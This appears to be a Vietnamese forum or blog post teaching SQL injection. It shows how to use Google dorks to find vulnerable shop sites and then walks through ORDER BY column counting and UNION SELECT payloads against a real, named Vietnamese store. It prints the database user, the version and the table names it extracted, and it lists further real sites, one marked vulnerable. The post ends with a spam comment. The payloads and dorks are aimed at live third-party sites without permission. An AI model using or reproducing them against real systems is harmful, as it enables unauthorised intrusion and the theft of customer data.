Chào tất cả các bạn . Chắc hẳn mọi người ai cũng thắc mắc và có 1 suy nghĩ là làm thế nào để mình học thật tốt , thật chất lượng .
Muốn vậy các bạn phải có sẵn kiến thức về MySQL , MS SQL Server , DB Access ....
Đầu tiên các bạn chuẩn bị cho mình những ebook về sql như mình nêu trên . Các tài liệu này các bạn Google giúp mình nhé
Tiếp theo , các bạn phải lắm vững cú pháp sql . Okay . Vào vấn đề chính . Trước tiên các bạn phải hiểu được SQL Injecttion là gì ? Vấn đề này các bạn vào link sau
Quote:
http://vi.wikipedia.org/wiki/SQL_injection
Bình thường để hack 1 site lỗi bao gồm các bước :
B 1 : Check
B 2 : Order By (Đếm số cột liên quan trong câu query mà URL của site đó chạy . Cái URL mà các bạn check ra lỗi đó )
B3 : Union Select
Vậy các bạn có hiểu tại sao lại làm vậy không ? và tại sao có site chúng ta order by bình thường thì được :
Quote:
http://site.com/index.php?id=3 Order By 10
Nhưng cũng có site lại phải thêm dấu nháy và dấu -- hoặc -- - hoặc -- a hoặc /* mới order by được
Quote:
http://site.com/index.php?id=3 Order By 10 --
http://site.com/index.php?id=3' Order By 10 --
http://site.com/index.php?id=-3' Order By 10 -- -
http://site.com/index.php?id=-3 Order By 10 --
http://site.com/index.php?id=-3 Order By 10 -- a
Mấu chốt duy nhất ở đây chúng ta cần hiểu là chúng ta đoán câu query mà admin code như thế nào để inject vô cho câu query đó đúng cú pháp . Có đúng cú pháp câu query mới văng ra kết quả thì chúng ta mới thấy được và khai thác được chứ
Chúng ta lấy luôn 1 victim và làm cho các bạn dễ hình dung nhé
Dork : ?frame=product&p=
Tìm site lỗi cái đã . Vào
Quote:
http://www.google.com.vn/
Và check tìm shop lỗi cho nhanh
Chúng ta điền vô ô tìm kiếm dòng này :
Quote:
inurl:?frame=product&p=
Rồi search
Cuối cùng mình chọn được em này
Quote:
http://www.songkhoe24.com/vitamin/vn...t&p=659&ct=175
Check lỗi
Quote:
http://www.songkhoe24.com/vitamin/vn...t&p=659&ct=175'
không thấy gì là lỗi cả
Check tiếp link này
Quote:
http://www.songkhoe24.com/vitamin/vn...=product&p=659
Quote:
http://www.songkhoe24.com/vitamin/vn...=product&p=659'
Lỗi này . Các bạn để ý sẽ thấy kết quả trả về của 2 link trên là khác nhau
Tính tiếp Order By
Quote:
http://www.songkhoe24.com/vitamin/vn...59+Order+by+22
~> lỗi
Quote:
http://www.songkhoe24.com/vitamin/vn...59+Order+by+21
~> Bình thường
Vậy có 21 cột
Tiếp Union :
Quote:
http://www.songkhoe24.com/vitamin/vn/?frame=product&p=-659+Union+Select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--
Thây số cột lỗi rồi : 2, 3 , 19, 6, 12, 20
Còn lại các bạn khai thác bình thường
Quote:
vitamin_haiyen@localhost|vitamin_haiyen|5.1.54
Quote:
album_categories,album_images,categories,config,co ntents,customers,
doc_categories,doc_files,donvi,faq,faq_categories, languages,link_websites,l
ink_websites_categories,news,news_hot,newscategori es,online,orderdetail,
orders,price,pro_good,pro_new,pro_saleoff,products ,providers,tailieu,user,visitors
Tổng kết bài này : Tài liệu SQL + Dork search google + Inject làm sao cho câu query của shop đúng cú pháp để có thể khai thác
Ngoài ra . Các bạn có thể vào
Quote:
http://mumauden.com/scan
Và điền dork theo mẫu rồi tìm kiếm site lỗi . Demo :
Quote:
Pages: [ 0 ]
Dork: [ inurl:*?frame=product&p= ]
Getting Result from Google...
Scanning...
http://www.2techvisuals.co.uk/product/ <== Failed
http://www.goodwillshop.co.uk/produc...e_frame_858692 <== Failed
http://www.allardycehealthcare.co.uk/productdetails.asp?catid='10&productid='531&produc tname='Toilet-Safety-Frame <== SQL Injection Vulnerable
http://www.coldframe.org.uk/product_...zed-Cold-Frame <== Failed
Chúc các bạn tìm được nhiều site lỗi với dork này . Bật mí nhé . Sài google sẽ tìm được nhiều hơn đó . Khổ lỗi toàn site việt không à
handgemachte Handtücher en jetzt online shoppen
Trả lờiXóa